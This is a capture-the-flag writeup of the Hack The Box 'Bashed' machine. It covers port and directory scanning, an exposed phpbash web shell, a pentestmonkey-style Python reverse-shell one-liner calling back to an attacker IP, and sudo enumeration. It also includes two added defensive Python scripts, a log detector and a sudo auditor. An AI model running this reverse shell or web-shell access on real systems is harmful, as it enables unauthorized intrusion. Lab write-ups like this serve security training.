👽Bashed Writeup
[File Misconfiguration] [Web]

Nmap
-sC: Performs a script scan using the default set of scripts
-sV: Probe open ports to determine service/version info
-O: Enable OS detection
-oA: Output in the three major formats at once
┌──(kali㉿kali)-[~/HTB/bashed]
└─$ sudo nmap -sC -sV -O -oA nmap_bashed 10.10.10.68
[sudo] password for kali:
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-10 07:18 EST
Nmap scan report for 10.10.10.68
Host is up (0.015s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Arrexel's Development Site
|_http-server-header: Apache/2.4.18 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
Network Distance: 2 hops
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.33 seconds
Visiting the URL http://10.10.10.68/ will bring us to the following web page.

Gobuster
dir: Uses directory/file enumeration mode
-w: Path to the wordlist
-u: The target URL
-f: Append / to each request
-x: File extension(s) to search for
┌──(kali㉿kali)-[~/HTB/bashed]
└─$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u 10.10.10.68 -f -x php,html
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.68
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: php,html
[+] Add Slash: true
[+] Timeout: 10s
===============================================================
2022/01/10 07:36:26 Starting gobuster in directory enumeration mode
===============================================================
/images/ (Status: 200) [Size: 1564]
/index.html (Status: 200) [Size: 7743]
/contact.html (Status: 200) [Size: 7805]
/about.html (Status: 200) [Size: 8193]
/icons/ (Status: 403) [Size: 292]
/uploads/ (Status: 200) [Size: 14]
/php/ (Status: 200) [Size: 939]
/css/ (Status: 200) [Size: 1758]
/dev/ (Status: 200) [Size: 1148]
/js/ (Status: 200) [Size: 3165]
/config.php (Status: 200) [Size: 0]
/fonts/ (Status: 200) [Size: 2095]
/single.html (Status: 200) [Size: 7477]
/scroll.html (Status: 200) [Size: 10863]
===============================================================
2022/01/10 07:40:39 Finished
===============================================================
Visiting the URL http://10.10.10.68/dev/ will bring us to a directory with the following files:

Dirbuster
Fuzzing for the extensions sh, py and pl using DirBuster.
┌──(kali㉿kali)-[~/HTB/shocker]
└─$ dirbuster
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Starting OWASP DirBuster 1.0-RC1
Enter the following fields in the DirBuster GUI:
Target URL
File with list of dirs/files
File extension
Starting dir/file list based brute forcing
Dir found: / - 200
Dir found: /images/ - 200
File found: /index.html - 200
Dir found: /icons/ - 403
File found: /single.html - 200
Dir found: /js/ - 200
File found: /js/jquery.js - 200
File found: /js/imagesloaded.pkgd.js - 200
File found: /js/jquery.nicescroll.min.js - 200
File found: /js/jquery.smartmenus.min.js - 200
Dir found: /demo-images/ - 200
File found: /js/jquery.carouFredSel-6.0.0-packed.js - 200
File found: /js/jquery.mousewheel.min.js - 200
File found: /js/jquery.touchSwipe.min.js - 200
File found: /js/jquery.easing.1.3.js - 200
File found: /js/custom_google_map_style.js - 200
File found: /js/main.js - 200
File found: /js/html5.js - 200
Dir found: /uploads/ - 200
Dir found: /php/ - 200
File found: /php/sendMail.php - 200
Dir found: /css/ - 200
File found: /css/carouFredSel.css - 200
File found: /css/clear.css - 200
File found: /css/common.css - 200
File found: /css/font-awesome.min.css - 200
File found: /css/sm-clean.css - 200
Dir found: /icons/small/ - 403
Dir found: /dev/ - 200
File found: /dev/phpbash.min.php - 200
File found: /dev/phpbash.php - 200
File found: /config.php - 200
Visiting the URL http://10.10.10.68/dev/phpbash.php opens a browser-based shell session on the server.

We can execute the following commands to test it:
echo $0: Print the name of the running shell. In this case, it is 'sh'.
whoami: Display the username of the current user.
sudo -l: List the user's sudo privileges, or check a specific command.

Since I know the flag for the user is in the file 'user.txt', I executed the following command to find it:
find / -type f -name '*.txt' 2>/dev/null | grep user
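From the defender's side, the directory brute force above and the later use of /dev/phpbash.php both leave traces in the Apache access log. The Python script below is an added example (not part of the original writeup) that scans constructed combined-format log lines for the default gobuster/DirBuster user agent, a burst of 404s from one client, and any PHP request under /dev/ or /uploads/; the sample log lines and the 404 threshold are assumptions.

```python
import re
from collections import defaultdict
# Constructed Apache combined-log sample (not real traffic from the box): the
# 404 paths are made up, the tool UA and phpbash path match the writeup.
SAMPLE_LOG = """\
10.10.17.239 - - [10/Jan/2022:07:36:26 -0500] "GET /admin/ HTTP/1.1" 404 292 "-" "gobuster/3.1.0"
10.10.17.239 - - [10/Jan/2022:07:36:26 -0500] "GET /backup.php HTTP/1.1" 404 292 "-" "gobuster/3.1.0"
10.10.17.239 - - [10/Jan/2022:07:36:27 -0500] "GET /test.html HTTP/1.1" 404 292 "-" "gobuster/3.1.0"
10.10.17.239 - - [10/Jan/2022:07:36:27 -0500] "GET /dev/ HTTP/1.1" 200 1148 "-" "gobuster/3.1.0"
10.10.17.239 - - [10/Jan/2022:07:41:02 -0500] "GET /dev/phpbash.php HTTP/1.1" 200 6512 "-" "Mozilla/5.0"
10.10.17.239 - - [10/Jan/2022:07:41:30 -0500] "POST /dev/phpbash.php HTTP/1.1" 200 220 "http://10.10.10.68/dev/phpbash.php" "Mozilla/5.0"
192.168.1.5 - - [10/Jan/2022:07:42:00 -0500] "GET /index.html HTTP/1.1" 200 7743 "-" "Mozilla/5.0"
"""

# Apache "combined" LogFormat: client, ident, user, time, request, status, bytes, referer, UA.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
SCANNER_UA = re.compile(r'gobuster|dirbuster', re.I)          # default tool user agents
# Any PHP hit under the dev/upload directories the writeup found exposed.
SUSPECT_PATH = re.compile(r'^/(dev|uploads)/[^?]*\.php(\?|$)', re.I)

def parse(log_text):
    """Yield a dict per well-formed combined-log line; malformed lines are skipped."""
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m:
            yield m.groupdict()

def analyze(log_text, notfound_threshold=3):
    """Flag scanner UAs, clients with >= threshold 404s (tiny for the sample), and PHP hits."""
    scanners, notfound, shell_hits = set(), defaultdict(int), []
    for rec in parse(log_text):
        if SCANNER_UA.search(rec["ua"]):
            scanners.add(rec["ip"])
        if rec["status"] == "404":
            notfound[rec["ip"]] += 1
        if SUSPECT_PATH.match(rec["path"]):
            shell_hits.append((rec["ip"], rec["method"], rec["path"]))
    return {
        "scanner_ips": sorted(scanners),
        "brute_force_ips": sorted(ip for ip, n in notfound.items() if n >= notfound_threshold),
        "web_shell_hits": shell_hits,
    }

if __name__ == "__main__":
    for key, value in analyze(SAMPLE_LOG).items():
        print(f"{key}: {value}")
```

Raise the 404 threshold well above 3 on a real server, and point the script at the access log rather than the embedded sample.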

Netcat
Execute 'nc -lvnp 5566' to create a listener on another terminal.
┌──(kali㉿kali)-[~]
└─$ nc -lvnp 5566
listening on [any] 5566 ...
Reverse Shell
Test if the system has Python installed
which python

We are able to get the Python reverse shell code from https://pentestmonkey.net
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.17.239",5566));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Netcat
Head back to the terminal where we started the Netcat listener.
┌──(kali㉿kali)-[~/HTB/bashed]
└─$ nc -lvnp 5566
listening on [any] 5566 ...
connect to [10.10.17.239] from (UNKNOWN) [10.10.10.68] 46604
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$
Sudo
sudo -l: List the user's sudo privileges, or check a specific command.
$ sudo -l
Matching Defaults entries for www-data on bashed:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on bashed:
(scriptmanager : scriptmanager) NOPASSWD: ALL
$
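The `sudo -l` result above is the kind of entry a host audit should catch: www-data may switch to scriptmanager with no password and no command restriction. The script below is an added example, not part of the writeup, that parses `sudo -l` output and rates each rule; the sample text mirrors the output shown above, with a second, benign rule constructed for contrast.

```python
import re
# Constructed `sudo -l` output modelled on the result shown above; the second
# rule is made up to show a benign entry beside the dangerous one.
SUDO_L_OUTPUT = r"""Matching Defaults entries for www-data on bashed:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on bashed:
    (scriptmanager : scriptmanager) NOPASSWD: ALL
    (root) /usr/bin/systemctl restart apache2
"""

# One rule line: "(runas_user : runas_group) TAG: TAG: command".
RULE_RE = re.compile(r'^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+?)\s*$')

def parse_rules(output):
    """Return the rules listed after the 'may run the following commands' header."""
    rules, in_rules = [], False
    for line in output.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        m = RULE_RE.match(line) if in_rules and line.strip() else None
        if not m:
            continue
        runas = [p.strip() for p in m.group("runas").split(":")]
        rules.append({
            "runas_user": runas[0],
            "runas_group": runas[1] if len(runas) > 1 else None,
            "tags": set(re.findall(r'[A-Z]+(?=:)', m.group("tags"))),
            "cmd": m.group("cmd"),
        })
    return rules

def audit(output):
    """Attach a severity to each rule; NOPASSWD + ALL is an unrestricted account switch."""
    findings = []
    for r in parse_rules(output):
        nopass = "NOPASSWD" in r["tags"]
        if r["cmd"] == "ALL" and nopass:
            sev = "critical"
        elif r["cmd"] == "ALL":
            sev = "high"
        elif nopass and r["runas_user"] in ("root", "ALL"):
            sev = "medium"
        else:
            sev = "info"
        findings.append({**r, "severity": sev})
    return findings
```

The fix on the host is to replace the `ALL` command with the specific script the service account actually needs to run, and to drop `NOPASSWD` unless the workflow truly requires it.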